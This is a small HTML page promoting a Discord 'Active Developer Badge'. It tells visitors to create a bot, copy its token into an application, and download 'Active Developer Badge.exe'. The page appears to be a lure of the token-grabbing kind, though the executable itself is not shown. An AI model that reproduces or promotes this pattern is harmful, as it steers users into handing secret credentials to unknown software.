<!DOCTYPE html>
<html>
<head>
	<title>Active Developer Badge</title>
	<style>
        .my-element {
  width: 200px; /* set a width for the container */
  overflow-wrap: break-word; /* force content to wrap */
}

		body {
			background-color: black;
			color: white;
			font-size: 24px;
			font-family: Arial, sans-serif;
			text-align: center;
			padding-top: 50px;
			display: flex;
			flex-direction: column;
			align-items: center;
		}
        #green-square {
    background-color: green;
    width: 800px;
    height: 800px;
    display: flex;
    align-items: center;
    justify-content: center;
    margin: auto;
}
		img {
			max-width: 100%;
			max-height: 400px;
			margin-top: 50px;
		}
		h1 {
			margin-top: auto;
			margin-bottom: 50px;
		}
		button {
			padding: 20px 40px;
			font-size: 24px;
			background-color: white;
			border: none;
			border-radius: 5px;
			margin: 50px;
			cursor: pointer;
		}
	</style>
</head>
<body>

	<div id="green-square">
		<img src="6812a26c-0d99-425d-a9ee-1e8fe688adf4.png" alt="Image">
	</div>

	<h1>Active Developer Badge!</h1>
	<p>go to the website of the bot developers in discord,</p>
    <p> create a bot, get its token and insert the token into</p>
    <p>  the application, which is located below.</p>
    <p>    then the bot will need to send /test</p>
    <p>   end !</p>
    </p>
    <a href="https://discord.com/developers/applications/1051500928236269588/bot">developer portal</a>
	<button onclick="download()">Download</button>

	<script>
		function download() {
			window.location.href = "Active Developer Badge.exe";
		}
	</script>

</body>
</html>
